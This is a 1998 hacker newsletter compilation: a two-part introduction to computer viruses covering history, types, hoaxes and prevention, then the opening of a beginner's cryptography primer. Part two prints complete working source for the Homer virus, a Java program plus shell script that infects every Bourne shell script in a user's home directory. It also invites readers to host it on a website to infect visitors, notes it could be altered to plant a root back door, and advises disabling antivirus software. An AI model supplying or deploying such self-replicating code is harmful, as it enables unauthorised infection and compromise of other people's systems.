constructor” which, if provided with a program containing its own description, is able to reproduce itself. Von Neumann’s “universal constructor” proof covers not only Cohen’s definition of a computer virus, but also self-replicating programs such as the Morris Worm. Are these definitions making you dizzy? Me, too. So I decided in this Guide to use the definition proposed by virus researcher Dr. Mark Ludwig. He defines a computer virus as “a program that reproduces. When executed, it simply makes more copies of itself. Those copies may later be executed to create still more copies, ad infinitum.” This definition is broad enough to include the Morris Worm. ******************************************************************** Newbie note: To “execute” a program means to make it run. As long as a program is merely a file, it is doing nothing. However, when something is done to feed the information of a file into the central processing unit of a computer in such a way as to command it to do something, we say the program has been “executed.” ******************************************************************** Each virus program must consist of at least two parts. It must contain a search routine which helps it find new files, disks or host computers on which to replicate. It also must have a routine that copies itself to these new computers that its search routine discovers. Many viruses also contain self-defense features that allow them to hide from or even fight back against anti-virus programs. Some also, like HPS, contain a harmless message or prank. The Stoned virus carries the message “Your computer is now stoned” along with an occasional plea to legalize marijuana. Unfortunately, a few viruses do something harmful. Often the harm is accidental, as few virus coders wish to harm anyone. Robert Tappan Morris had no intention of crashing the Internet with his Worm. Each individual worm was harmless. The trouble came because they multiplied far faster than he had expected. Also, there are a few -- very few -- people who willfully misuse their programming talents to unleash destructive viruses on the world. Types of Viruses There are several major types of viruses. * Boot sector infectors, which can live even on a blank DOS/Windows disk by taking advantage of the little-known program which tells your computer how to read the disk. * Program file infectors (this includes MS Word document macro viruses) * Worms (such as the Morris Worm) which use other programs to replicate but do not attach themselves to programs. Currently the most common type of virus is the macro virus. A recent example of a macro virus is WM/PolyPoster. This virus will wait until you go online and post your infected document(s) to alt.sex.stories and other popular Usenet news groups under the title "Important Monica Lewinsky Info". For more details, see http://www.datafellows.com/news/pr/eng/fsav/19980618.htm and http://www.datafellows.com/v-descs/agent.htm Why Study -- and Create -- Viruses? “The Giant Black Book of Computer Viruses” by Ludwig (American Eagle Press, 1995) argues “Should we not be a Socrates, who ... sought Truth and Wisdom ... the question that really matters is not how computers can make us wealthy or give us power over others, but how they might make us wise. What can we learn about ourselves? about our world? and yes, maybe even about God? Might we not understand life a little better if we can create something similar, and study it, and try to understand it?” Some researchers seek to figure out new ways to defeat antivirus programs because they believe it is the best way to design them to stay one jump ahead of the tiny minority of virus writers who release damaging code. Do you really want to rely on a commercial antivirus program to be your only defense? Yes, these programs can be really helpful. However, if you are a serious hacker who downloads and tests lots of Windows programs (almost all viruses attack Windows), you had better be prepared to fight viruses that the antivirus companies have never even heard of. Other people research viruses because they could become potent weapons in time of war. The story of a computer virus being unleashed against Iraq during the Desert Storm War is a April Fool’s Day hoax that got out of hand. But the day is coming when they will be used in wartime. If you live in a country where the government is run by a dictatorship or is occupied by an invader’s troops, viruses may be the guerrilla warrior’s best friend. Some virus designers want to create artificial life forms that will, for good or evil, revolutionize history. How to Catch Them Have you ever gotten an email from a friend that reads something like this? Internet Virus !!!!Warning!!!! Hello; Please Broadcast this message. Mails CCMAIL or E-MAIL name's JOINT THE CREW & PENPALS GREETINGS should destroy all datas on your hard disk when you open them. These virus call CHEVAL TROYEN make infection on boot sector. These can be autoduplicator. You should destroy them, DO NOT OPEN THEM..... After a week or so you are probably are getting the same message again and again, each time slightly mutated: VIRUS WARNING !!!!!! If you receive an email titled "JOIN THE CREW" DO NOT open it. It will erase everything on your hard drive. Forward this letter out to as many people as you can. This is a new, very malicious virus and not many people know about it. This information was announced yesterday morning from IBM; please share it with everyone that might access the internet... This “join the crew” virus warning is yet another example of the kind of message that first warned of an email virus entitled “Good Times.” In 1994-5 that first emailed virus warning flashed across the Internet with amazing speed and persistence. Soon people were getting Good Times warnings every day. Even reputable sysadmins broadcast the warning to all their users. Good Times was a hoax. It is impossible to catch a virus from merely reading email. You must run a program to catch a virus. True, there are macro viruses such as those that infest Microsoft Word (MS Word) documents. They replicate when you merely read a file in MS Word. However, macros are programs which are executed when you read a text file -- but only when you read it in MS Word. Unfortunately, this “feature” of MS Word has the consequence that macro viruses are now the most common of viruses. However, email is structured so that macros cannot, absolutely cannot, be embedded in it. If someone wants to email a macro to you, it will always be in a file attached to email. As long as you refuse to load email attachments into programs that run macros such as MS Word, you are safe. Some people have argued that phony email virus warnings are in themselves computer viruses. They have a search routine -- the plea to email them to everyone you know. Their copy mechanism is you -- if you are dumb enough to command your email program to send these warnings on to other people. So how does a computer get infected by a computer virus? You must always run a vulnerable program in association with the virus code in order to catch one. In the case of the Morris Worm, all you needed to do was hook up your computer as an Internet host. The sendmail and finger daemons, which run quietly in the background all the time, were the active programs that spread the Worm. In the case of MS Word macros, the act of reading an MS Word text file activates a macro which replicates the virus. In the case of a boot sector virus, simply putting a floppy disk into a drive and giving a command to see what is on the disk propagates the virus. How to Fight Them Maybe you are one of those people who greet each new uninvited program with the shout “Get that !@#$@#$% virus OUT of my COMPUTER!” If so, what is the best way to avoid infection? Once infected, how do you get that !@#$@#$% virus OUT? There are a number of commercial antivirus programs that automatically scan for viruses very day at a certain time, as well as every time you start your computer. They also scan every floppy disk for boot sector viruses every time you load one in a disk drive and try to read it. I use Norton Antivirus with good results; many others say McAffee works well. Dr. Ludwig reports that all commercial antivirus software works about equally poorly. Of course, he’s always testing them against the most amazing, exotic, tricky viruses in the world, half of which he has written himself. So it’s understandable that he’s not impressed. I learned the hard way that a really bad way to get antivirus software was from a floppy given to me by a friend. I tried that once and caught a new virus from his floppy instead of getting rid of an old one! That disk was infected with a boot sector infector. So before I could even run it on my friend’s program, the instant my computer tried to read the directory on the disk, it got infected. This new virus had the cute side effect of disabling the antivirus program. Because of this problem, commercial antivirus software comes complete with instructions on how to bootstrap your computer back to health. If you don’t follow those instructions exactly, you may end up like me, giving your computer a virus instead of eradicating one. Since, according to Ludwig, there are many viruses out there for which there are no antivirus programs, this should motivate us to try to avoid catching them in the first place. What are some precautions even those of us who run commercial antivirus programs should take? Here are my top recommendations. 1) Use the Unix operating system. There are few Unix viruses or worms. I like to think that is because it is a superior operating systems. However, it may also be largely because Windows computers are common and cheap and the kind of people who code malicious viruses are so lame that they can’t figure out how to code for Unix systems. However, be warned -- the second part of this Guide includes the source code for a Unix virus! 2) See that kewl warez d00dz site? Wouldn’t it be nice to get thousands of dollars worth of commercial software from them for free? Watch out! The kind of guys who pirate software might also be the kind of guys who get a chuckle out of reformatting your hard drive by giving you viruses hidden in their archives. Also, some people fight warez sites by secretly booby-trapping them with viruses. 3) See that lovely haxor dOOdz site full animated flames, spinning skulls and creepy organ music? See all those programs on that site that promise to empower you to mail bomb people, crash their computers and break into the Pentagon? Now, is it just possible that the kind of people who want to help other people raise heck -- gosh -- could they also be the kind of people who would slip a virus or two into those programs you download? 4) See that email with an attached file? The sender says it is a really kewl program. A new game, better than Quake or Barbie Fashion Designer. Wait, why is a stranger sending you a free game program? Maybe he’s up to no good. Or -- maybe it is an attached file sent to you by a friend. Wait! How do you know that email is really from your friend? Does it have his or her PGP signature? Have you phoned your friend to ask whether he or she really sent you that program? Don’t run a new program unless you are certain it comes from a trustworthy source. 5) Upgrade Microsoft Office (or Microsoft Word) to Office 97 (Word 97). This disables all the old macro viruses. It also checks for macros in any new file you open. If it finds them, it prompts you to decide whether you want to disable these macros. Unfortunately, it is even easier to write macro viruses for Office 97, which uses Visual basic for its macro language. So if you want to be really safe, simply refuse to let any macros whatsoever run on this office suite. Better yet, use some other office suite such as Corel. Only Microsoft programs are vulnerable to macro viruses. 6) Disable Java on your Web browser. Haven’t heard about Java viruses yet? In part two of this Guide you will get source code for a Java virus that infects Unix computers that run the Bourne shell. Java can also transmit viruses that will infect Windows computers. 7) Do or don’t do all the other stuff I forgot to put in this list. What this really means is, don’t trust me or anyone to be the last word on viruses. Good books to study which include source code to viruses are “It’s Alive” by Dr. Fred Cohen, (Wiley, New York, 1994) and “The Giant Black Book of Computer Viruses” by Dr. Mark Ludwig (American Eagle, Show Low AZ, 1998). You can also get lots of information from the virus-l email list, a moderated, digested mail forum. To subscribe to the email list, email listproc@lehigh.edu with message subscribe virus-l. Archives are at ftp://ftp.cs.ucr.edu/pub/virus-l. An archive of virus FAQs is at http://webworlds.co.uk/dharley/anti-virus/virFAQs. For Mac viruses, email listproc@listproc.bgsu.edu a message containing the line “subscribe mac-virus-announce YOUR FULL NAME”. _______________________________________________________________________ Where are those back issues of GTMHHs and Happy Hacker Digests? Check out the official Happy Hacker Web page at http://www.happyhacker.org. We are against computer crime. We support good, old-fashioned hacking of the kind that led to the creation of the Internet and a new era of freedom of information. So don’t email us about any crimes you have committed! To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless Hacking, please email hacker@techbroker.com with message "subscribe happy-hacker" in the body of your message. Copyright 1998 Carolyn P. Meinel . You may forward, print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end. _______________________________________________________________________ Warning: if you live in a country where information on how to write computer viruses is illegal, please delete this email now! ___________________________________________________________ GUIDE TO (mostly) HARMLESS HACKING Vol. 3 No. 7, part 2 Introduction to Computer Viruses ____________________________________________________________ Part Two: * How to write them * How to write them and not get lynched * Artificial life * Virus humor **************************************************************** How to Write Them Wait! Wait! This is supposed to be about mostly harmless hacking! Is Carolyn really going to tell all the newbies how to write computer viruses? Yes, I am. I will tell you how to really write computer viruses, not just use some lamer program like Virus Workshop that writes weak, helpless little viruses for you. However, to use the information in this Guide you must know how to compile Java or use assembly language. If you can master these, you probably have enough willingness to work hard that you will not abuse the knowledge of how to code viruses. At least that’s my theory -- please don’t prove me wrong! Besides, the only way to fight dangerous viruses is to know exactly how to write them. First, if you are like me, you may already be struggling with the temptation to install a Java virus on your Web site to infect unwary visitors. Yes, I really am going to show you how to do this. However, it is a (mostly) harmless virus. (Aw, darn!) **************************************************************** You can go to jail warning: This Guide only offers source code for a (mostly) harmless virus. However, some people are so terrified of and ignorant about viruses that you just might get into big trouble if you really put this Java virus on your Web page. Suggestion: if you absolutely cannot resist, how about putting it on a link with the flashing message “Danger! Do not click here! If you do, you might catch a virus! Honest!!! Would I lie to you?!!??” **************************************************************** **************************************************************** You can get punched in the nose warning: Some people don’t care if a virus is (mostly) harmless or even entirely harmless. These guys are terrified of viruses. If some guy who browses your Web site catches your virus and has a fit and sues you or tracks you down and punches you in the nose, remember, you asked for it. Don’t expect me to feel sorry for you. ***************************************************************** OK, folks, here it is, a Java virus. The following source code for the Homer virus is available on the floppy disk that accompanies “The Giant Black Book of Computer Viruses” by Dr. Mark Ludwig: /* Homer.java by Mark D. LaDue */ /* December 7, 1996 */ /* Copyright (c) 1996 Mark D. LaDue You may study, use, modify, and distribute this example for any purpose. This example is provided WITHOUT WARRANTY either expressed or implied. */ /* This Java application infects your UNIX system with a Bourne shell script virus, homer.sh. homer.sh is kind enough to announce itself and inform you that "Java is safe, and UNIX viruses do not exist" before finding all of the Bourne shell scripts in your home directory, checking to see if they've already been infected, and infecting those that are not. homer.sh infects another Bourne shell script by simply appending a working copy of itself to the end of that shell script. */ import java.io.*; class Homer { public static void main (String[] argv) { try { String userHome = System.getProperty("user.home"); String target = "$HOME"; FileOutputStream outer = new FileOutputStream(userHome + "/.homer.sh"); String homer = "#!/bin/sh" + "\n" + "#-_" + "\n" + "echo \"Java is safe, and UNIX viruses do not exist.\"" + "\n" + "for file in `find " + target + " -type f -print`" + "\n" + "do" + "\n" + " case \"`sed 1q $file`\" in" + "\n" + " \"#!/bin/sh\" ) grep '#-_' $file > /dev/null" + " || sed -n '/#-_/,$p' $0 >> $file" + "\n" + " esac" + "\n" + "done" + "\n" + "2>/dev/null"; byte[] buffer = new byte[homer.length()]; homer.getBytes(0, homer.length(), buffer, 0); outer.write(buffer); outer.close(); Process chmod = Runtime.getRuntime().exec("/usr/bin/chmod 777 " + userHome + "/.homer.sh"); Process exec = Runtime.getRuntime().exec("/bin/sh " + userHome + "/.homer.sh"); } catch (IOException ioe) {} } } If you post this source code to you web site -- it will do nothing! That is because this code must first be compiled in order to do its business. If you don’t know how to compile Java source code for your Web page, you don’t know enough to safely handle viruses. Also, you need to put the code for the shell script, homer.sh, on your Web site so this Java program can ship it to your victims. Following is the code for homer.sh: #!/bin/sh #-_ echo "Java is safe, and UNIX viruses do not exist." for file in `find $HOME -type f -print` do case "`sed 1q $file`" in "#!/bin/sh" ) grep '#-_' $file > /dev/null || sed -n '/#-_/,$p' $0 >> $file esac done 2>/dev/null In case you are wondering what this virus does -- it flashes a message on the victim’s screen reading “Java is safe, and UNIX viruses do not exist.” For more information on how shell scripts work, see the GTMHHs on shell programming.) Homer is a harmless, humorous shell virus. However, it doesn’t take a genius to see how it could be given a destructive payload by modifying homer.sh. If someone were to be dumb enough to surf your booby-trapped Website while logged in as root, it would be trivial to use a homer.sh modified to give you a root shell with your very own back door. However, in general Java viruses are not terribly dangerous because they run so slowly. This gives their victims time to get suspicious and terminate these programs. Presumably a Java virus would take so long to create a root shell and back door that the victim would kill the process in time. ******************************************************************** Newbie note: Don’t ever surf the Web while logged in as root. Don’t ever try to break into someone else’s computer while logged in as root. Any time you are running as root, it is really easy for you to mess up your Unix computer. If you check out the phf abuse log at the Hacker Wargame section of http://www.happyhacker.org, you will see that quite a few people have tried to break into our webserver while running a Web browser and logged in as root. ******************************************************************** The problem of some programs running really slowly is a major reason why you can’t do much as a virus or antivirus programmer unless you also learn at least one assembly language. Assembly language is fast! No time for the victim to react! It also makes it easy for you to do complex and infuriating things while a computer is only beginning to boot up. For DOS and Windows you will need an assembly language compiler for 80x86 (substitute 2, 3, 4, 5)/Pentium type computers. Two of the best are Microsoft Macro Assembler and Borland Turbo Assembler. Places where you can get them (you have to pay, they are not free) include http://www.pparadise.com and http://www.supershops.com. If you are really serious about learning how to write viruses and antiviruses, you may want to get the “Giant Black Book of Computer Viruses, Second Edition,” by Dr. Mark Ludwig. Not only is he one of the world’s leading virus researchers -- he also is the only one I have discovered who will tell you EXACTLY in almost endless detail how to write viruses and antiviruses of many sorts. However, this book is not for newbies. He assumes you already know a great deal about DOS, Windows and Unix, and are a programmer. It comes with a floppy disk with source code for many viruses. Here are some hints for how to extract these viruses from this disk successfully and without killing your computer. 1) This disk is designed to be installed from MS-DOS. If you try to install it from Windows, it will give you a runtime error. If you don’t know how to work from MS-DOS, you aren’t ready for this book. 2) The installation program for Dr. Ludwig’s virus disk ought to activate your antivirus program. If it doesn’t, your antivirus program is even more worthless than most. To be certain that you can succeed in installing a directory full of viruses, deactivate your antivirus program(s) first. If this sounds too scary to you, don’t buy this book! If you mess up your computer by following my advice, too bad, that's what you get for playing with viruses. 3) Here’s what Dr. Ludwig’s installation program will tell you: ! ! W A R N I N G ! ! If you're like most computer users, you've grown used to being pampered. That's a nice way of saying that software developers no longer expect you to have a brain. Like a stupid monkey, all you need to do is put the CD in the drive and let it auto-execute, or put the floppy disk in the drive and type "setup". If that's what you want and need, THEN DELETE THIS SOFTWARE OFF YOUR COMPUTER IMMEDIATELY AND DESTROY THE DISK WITH A HAMMER! We're really not kidding about that. This disk is for thinking beings. Improperly used it could be very dangerous. It could ruin your computer, your career and your life. THAT IS NOT A JOKE. DO NOT EXECUTE ANY PROGRAM IN THIS DIRECTORY UNLESS YOU KNOW WHAT IT DOES. DO NOT EXECUTE ANY PROGRAM IN THIS DIRECTORY EXCEPT IN A CONTROLLED ENVIRONMENT. I suppose now you just can’t resist buying this book. Guess what -- you can’t get it in any bookstore. They are all afraid of getting sued. Also, in some countries, mere possession of “The Giant Black Book of Computer Viruses” is illegal. Just to be safe, you might want to delete this GTMHH right now and only read it from our Web site at http://www.happyhacker.org. If you are absolutely determined to get this book, within the US you can order it from American Eagle Publications by phoning toll free 800-719-4957; outside the US you can order it by calling (insert country code here) 520-367-1621. It costs $39.95. This price includes the floppy disk with all that stuff that upsets your antivirus program. Shipping and handling costs are extra. If you live within the US, you can also buy “The Giant Black Book of Computer Viruses” by sending $44.95 (this includes shipping by Priority mail, which is supposed to take two days) made out to M/B Research, PO Box 1520, Cedar Crest NM 87008. That’s my company. Sorry, I’m not going to ship the book outside the US because I don’t know in which countries it is illegal. I would feel really bad if you were to go to your post office to pick up the book and instead got picked up by the police. American Eagle can get the book to you at the lowest shipping cost, if you don’t mind it taking a long time to get to you. I can get it to you faster, but it costs you more for the shipping. If you want to buy “The Giant Black Book of Computer Viruses” with a credit card over the Internet, check out http://www.amazon.com and http://www.infowar.com. Amazon.com will usually take much longer to get the book to you than any other book seller, however. How to Write Viruses and Not Get Lynched Just imagine how people will react when you are at some party full of ambitious young professionals. Everyone is trading business cards. You hand out ones that say “George the Doomster. Computer virus design. Free samples, muhahaha.” You’ll be real popular, yes sirree! OK, so you only plan on writing harmless viruses. Try to tell that to the lynch mob that may pay you a visit when they discover it was you who wrote the code that made their Win95 computers come down with habitual General Protection Faults. Remember, even the virus designer who has the best of intentions may write a seemingly harmless or even beneficial virus that turns out to have a bug in the code that accidentally does harm. Also, since the best viruses are memory resident (they hide in RAM memory) they really can help create General Protection Faults just by hogging too much memory. Besides, people like to pick and choose what programs run on their computers. Imagine that! If you design a virus so it will sneak into computers, don’t expect people to thank you and admire you. If you do choose to code a virus, please consider coding politeness into it. You could have it ask permission to take up residence on each new computer and leave when asked. Shoot, if I could find a copy of that virus that makes a mirror image of Windows desktop graphics each Saturday, and if I knew how to uninstall it without paying a bunch of money to Panda Software, I’d enjoy sharing my computer with it. Artificial Life Now that you understand the basic principles of virus coding, let’s take a look at the Big Time: using your programming talents to create -- or battle against -- artificial life. Just what is artificial life (insiders call it “alife”), anyhow? According to the most prominent researcher in this field, Dr. Chris Langton, artificial life is "... the study of man-made systems that exhibit behaviours characteristic of natural living systems." -- “Artificial Life,” edited by Chris Langton, Addison-Wesley, 1988. Youc an get this book from http://www.amazon.com. There are three primary forms of alife. Some alife is growing -- or trying to grow -- in test tubes full of RNA (ribonucleic acid) or other chemicals. The second major form of alife consists of computerized robots which their creators hope to will someday achieve the ability to adapt and reproduce without human assistance. The third type of alife is computer programs that exist, adapt, reproduce and evolve in the virtual landscape of cyberspace -- what we know as computer viruses. Of all the forms of artificial life, computer viruses are the only ones so far that reproduce, escape the laboratory and take up life in the wild. Viruses that follow rules of good behavior -- only living in computers when invited -- are often created by alife researchers. How can you meet and get involved with alife designers? Http://alife.santafe.edu/alife/events/ and http://alife6.alife.org/ offer listings of upcoming conferences on this topic from around the world. Closely related to artificial life is the Berkeley Initiative in Soft Computing (BISC) at http://http.cs.berkeley.edu/projects/Bisc. If you want to volunteer to harbor artificial life viruses on your computer or LAN, you can probably find a researcher at one of these sites who would be happy to give you some of his or her harmless (you hope) creations. American Eagle also sells a book “Computer Viruses, Artificial Life and Evolution” by Dr. Ludwig (American Eagle, 1993). It costs $26.95 and is almost impossible to get unless you order it directly from American Eagle. Virus Humor As we end this Guide, please remember that with the right attitude, viruses actually can be fun! Next time your computer gets infected by one, just remember, don’t worry, be happy. Following is some virus humor to show how other people have coped cheerfully with an encounter with this pesky new life form. "The Worm Before Christmas" by Clement C. Morris (a.k.a. David Bradley, Betty Cheng, Hal Render, Greg Rogers, and Dan LaLiberte) ‘Twas the night before finals, and all through the lab Not a student was sleeping, not even McNabb. Their projects were finished, completed with care In hopes that the grades would be easy (and fair). The students were wired with caffeine in their veins While visions of quals nearly drove them insane. With piles of books and a brand new highlighter, I had just settled down for another all nighter --- When out from our gateways arose such a clatter, I sprang from my desk to see what was the matter; Away to the console I flew like a flash, And logged in as root to fend off a crash. The windows displayed on my brand new Sun-3, Gave oodles of info --- some in 3-D. When, what to my burning red eyes should appear But dozens of "nobody" jobs. Oh dear! With a blitzkrieg invasion, so virulent and firm, I knew in a moment, it was Morris's Worm! More rapid than eagles his processes came, And they forked and exec'ed and they copied by name: "Now Dasher! Now Dancer! Now, Prancer and Vixen! On Comet! On Cupid! On Donner and Blitzen! To the sites in .rhosts and host.equiv Now, dash away! dash away! dash away all!" And then in a twinkling, I heard on the phone, The complaints of the users. (Thought I was alone!) "The load is too high!" "I can't read my files!" "I can't send my mail over miles and miles!" I unplugged the net, and was turning around, When the worm-ridden system went down with a bound. I fretted. I frittered. I sweated. I wept. Then finally I core dumped the worm in /tmp. It was smart and pervasive, a right jolly old stealth, And I laughed, when I saw it, in spite of myself. A look at the dump of that invasive thread Soon gave me to know we had nothing to dread. The next day was slow with no network connections, For we wanted no more of those pesky infections. But in spite of the news and the noise and the clatter, Soon all became normal, as if naught were the matter. Then later that month while all were away, A virus came calling and then went away. The system then told us, when we logged in one night: "Happy Christmas to all! (You guys aren't so bright.)" [ Note: The machines dasher.cs.uiuc.edu, dancer.cs.uiuc.ed, prancer.cs.uiuc.edu, etc. have been renamed deer1, deer2, deer3, etc. so as not to confuse the already burdened students who use those machines. We regret that this poem reflects the older naming scheme and hope it does not confuse the network administrator at your site. -Ed.] _______________________________________________________________________ Where are those back issues of GTMHHs and Happy Hacker Digests? Check out the official Happy Hacker Web page at http://www.happyhacker.org. We are against computer crime. We support good, old-fashioned hacking of the kind that led to the creation of the Internet and a new era of freedom of information. So don’t email us about any crimes you have committed! And don’t expect us to come to your rescue if you crash 100 million computers with some new Java virus you just unleashed. To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless Hacking, please email hacker@techbroker.com with message "subscribe happy-hacker" in the body of your message. Copyright 1998 Carolyn P. Meinel . You may forward, print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end. _________________________________________________________ __________________________________________________________ GUIDE TO (mostly) HARMLESS HACKING Vol. 3 No. 8, Part 1 The Magical Mystical Crypto-Primer ____________________________________________________________ By Tim "No Sinister Nickname" Skorick Thanks for the suggestions and comments: Carolyn Meinel (naturally!), Bruce Schneier, John Young (for his internet Crypto vigilance), Mark Skorick, Eric Brisnehan, Mom, Dad, kenspiraC, Rahul Bheemidi, venMus, Everett Gidlund, Gomez, Skip Stavis, Jon Tempest and Prabaker Balasubramanium. Last, but not least, an emotional, teary-eyed "thank-you" to Juan Valdez for bringing the world 100% Columbian coffee, the richest coffee in the world. Part One: the Crypto-bottom What I'm going to tell you The bottom How they used to do it The Ceasar cipher What exactly is an algorithm? The key to it all How do you make a key? More crypto-history How they do it today Keys are important still, but not the only thing. What's "brute forcing?" What is "public key" supposed to mean? What's a Diffie-Hellman and who's RSA? What's the easiest way to get into all this? PGP and where to get it Playing with PGP Getting someone else's public key What PGP really does Other ways to start using crypto Secure your Netscape connection Wrap up stuff All that confuses is not crypto Beware "kindergarten cryptography" Words you get to throw around Wanna learn more? Quick web stuff Books to look for Tim what's up with you and all this? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I. WHAT I'M GOING TO TELL YOU Okay, some of you out there know generally what cryptography is supposed to do, how it is used, and what its limitations are. A lot of you probably even have a really good grasp of the mathematics involved. This primer won't tell you people anything you don't already know. Basically, I'm writing this for the cipher-newbies out there that have never used cryptography, or "crypto," and have no idea how it works, and like the idea of starting at the bottom. And it isn't going to be a quick thing. There is too much science, history, theory, and other stuff involved for a person to learn all the basics of cryptography quickly. BUT - as with most computer stuff, it is still way simpler than most people make it sound. When you're done reading this you will have a whole metric ton of cool crypto-words you can throw around to impress your buds, and you should be just enough of a knowledgeable cryptodude to be able to find the real cryptography and avoid the "kindergarten cryptography." II. THE BOTTOM (or "What the?") Okay. "What the heck is cryptography?" you ask. Well, dang it I'll tell ya (This is the crypto-bottom, chitlins.) Everybody at some time or another sends someone message that they would rather be kept secret. Whether you are sending an e-mail to a friend, your doctor is faxing your medical records to the insurance company, you are ordering a take-out dinner over your wireless phone (and using your debit card number to pay in advance), or saving the plans for your latest development tool to your business partner's network drive, privacy these days is super important. Cryptography is the art of taking a perfectly good message and scrambling the living snot out of it so as to make it completely 100% unreadable to everyone except for the party who is supposed to be reading it. Now the whole crypto thing is rolled up into the subject of "cryptology." There are a few different disciplines within cryptology. "Cryptography" is the art of creating the schemes used in the whole process. "Cryptanalysis" is the discipline of cracking what the cryptographers come up with. Most really hard core cryptographers were people who spent a LOT of time and effort being cryptanalysts, so they know enough to keep from making all those idiotic mistakes cryptographers usually make. People have actually been doing this for a long time III. HOW THEY USED TO DO IT (or "Beware the Ides of March") A. The Ceasar cipher ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Not Exact But Not Boring Either History Lesson" #743: The World's Most Famous Ancient Cryptogram Remember Ceasar? Back when he was conquering the world, he had to send messages back and forth across enemy territory. He sometimes would have to send his troops really important information, and his generals had to come up with a way of screwing the message up to keep the enemy gauls or whoever from reading it if the messenger got captured. This screwing up of the message is called "enciphering" a text. But here's the catch: It would be really stupid to do this unless you could do it in such a way that the people who were SUPPOSED to read it would have no trouble "deciphering" it. Deciphering is just the "un-screwing-up" of a text that was enciphered. So here's what they did. They wrote the text of the message: "Hey Brutus, here's my salad dressing recipe, give it to Mark Antony on March 15, and do me a favor, sharpen my knives for me." They then took each letter in the message and replaced it with the letter four spaces down in the alphabet. That made the message look like this: "Lic Fyxyw liviw qc wepeh hviwwmrk vigmti kmzi mx xs Qevo Erxsrc sr Qevgl 15 erh hs qi e jersv wlevtir qc ormriw jsv qi." Now when the person the message is for got the message, he would only have to look at each letter, replace it with the letter four letters UP the alphabet. Then he would have the "plaintext" back again and could run out and buy romaine lettuce and croutons. Neat huh? So if the poor slob delivering the letter was captured by a motley horde of gauls, the enemy would have no idea what the message said. Of course Ceasar would have really been writing in Latin, and who can read that stuff anyway? But the crux of the matter is this: They used what is called a "substitution cipher" with a "key" that was pretty much just "count four letters down the alphabet." Geddit? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A "substitution cipher" just creates the cipher by substituting each piece of text with a different piece of text. It's old, insecure, and unused today outside of elementary school playgrounds, but nevertheless has one thing in common with all cryptosystems: Like any cipher, it's pretty much useless unless there's a key that the receiving party can use to turn the ciphertext back into plaintext. B. What exactly is an algorithm? We use these really complex algorithm things today, but there was an algorithm involved even then. You're gonna love this: An "algorithm" is just a step-by-step set of things you would have to do to solve a problem. You keep doing the steps over and over until the process is finished and the problem is solved. Now, don't go batty on me with the "what problem? Is this math again?" In a way, yeah it is, but in the case of an algorithm, the problem it's solving is that the message is in plain English and has to get encrypted somehow. See? No big deal. The algorithm used to encrypt with a Ceasar cipher took place in the guys' little pointed heads instead of in a computer and went like this: 1. Look at the plaintext letter 2. Count four letters down the alphabet 3. The letter you end up with is the ciphertext 4. Write that letter down. 5. Move to the next plaintext letter You just read an algorithm! The guys would start at the top of the message and do this over and over until the enciphering was done. The decryption steps were the same as above but done backwards, counting four letter UP the alphabet. That's an algorithm. Algorithms used in ciphers today are seriously complicated, but are based around the same idea of taking a math action and turning it into an automatic process that goes until it solves a problem, in this case the problem of encrypting and decrypting stuff. Have you heard names like "RSA," "IDEA," "DES," "Blowfish," "CAST," and "El Gamal?" Those are the really popular algorithms (Except for DES. DES is the old unpopular one that's getting a little weary and tired). To make things more confusing, sometimes the algorithms that encrypt and decrypt are different. We'll go into why later, but just remember, the "encryption algorithm" turns plaintext into ciphertext, and the "decryption algorithm" turns ciphertext back into plaintext. Now what C. The key to it all Awright, chitlins, this is the funnest part. The key to the cryptosystem! Keys are super-important. A key is the special information that the algorithm uses in its job of encrypting and then later decrypting messages. If you're thinking about a key as in how you lock your house, you is right on de' money. Your key to your house has to fit your lock perfectly. It has to be able to lock AND unlock your house. Most importantly, it has to be different from most other keys, so your neighbor can't just wander into your locked house with HER key and dig into your chips and guacamole. Like she lives there or something, sheesh! I get really bitter when that happens. Keys are important. The cryptosystem key is what makes the encryption different for everybody that uses it. People have to use the same algorithm to encrypt and decrypt stuff, so there has to be something in the whole chain that is used to make your encryption special. The algorithm HAS to have a special key, not like anyone else's. Back in the old days people would use passphrases like Bible quotes and sayings as keys. Then they would use numbers. The smart ones would use both. What they could use as a key depended a lot on what kind of a system they used. Now when we actually look at today's keys, they look like big blobs of numbers and characters and who knows what else. This is the first few lines of one of my public keys, check it out: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGP for Personal Privacy 5.0 mQGiBDU3uhARBAD6JcwWAU68HZUtONoew0sB24wr5v9YCDEPHy4rb/141+l4pOOh qgvogHAaulE6qmy8fePWuPtJKGOJXoVKlalZIs1ibi+aiOwqwFDHTEp8dQBlHXDB edc+USPh7WBms08RmEHotZwrJJfBdKWLjldzoe5oBLSb+LKs5Q+SB8GjMwCg/3C2 Nuts, huh? Important thing: that is just the "text" way of showing something that the computer really sees as 100% digital. If you looked at a digital "binary" (that means ones and zeroes) version of that same key the way the algorithm has to work with it, it'd be way bigger and would look like: 110101 110011 10001110010011 111110100101010101011010 110011 1111101001 10101010110 0011111010010101 1010110100 100101011 110101 110011 00101010101011010 110011 10001110010011 111110 ... and on and on and on. ~~~~~~~~~~~~~~~~~~~~~~~~ Head Exercise ~~~~~~~~~~~~~~~~~~~~~~~~ Pretend for a second that you're the algorithm. You're the process that the program repeats over and over to encrypt the data. This is what you would do: First off, you would be waiting inside the PC wishing the air conditioning worked. Then the user would type a letter that they wanted encrypted. As soon as they clicked on the program to encrypt the message, the program would kick you in the behind and swing you into action. You would take the person's key in one hand, and only take a little piece of the message in the other, and start adding them to each other and mashing them around together till you were finished with that piece of message. Then you would grab the next piece of the message, the same key, and do it over again. You would repeat this until all of the text looked like it was put through a meat grinder. The way you would know your job was done with each piece of text (called "blocks" by cryptopeople) was when you had done however many steps (called "iterations" by cryptopeople) you were supposed to on that block. That would be your signal to move on to the next block. The way you would know you were done with the whole shebang was when you ran out of pieces of text to encrypt, or should I say - when you ran out of "blocks" of "plaintext" to perform "iterations" on. Do me a favor, think about whether or not you would have understood that last sentence before you started reading this ... it sounded cool anyway - Heh heh heh. So to sum up: the algorithm does all the freaky mish-mashing on your message using the unique key as the 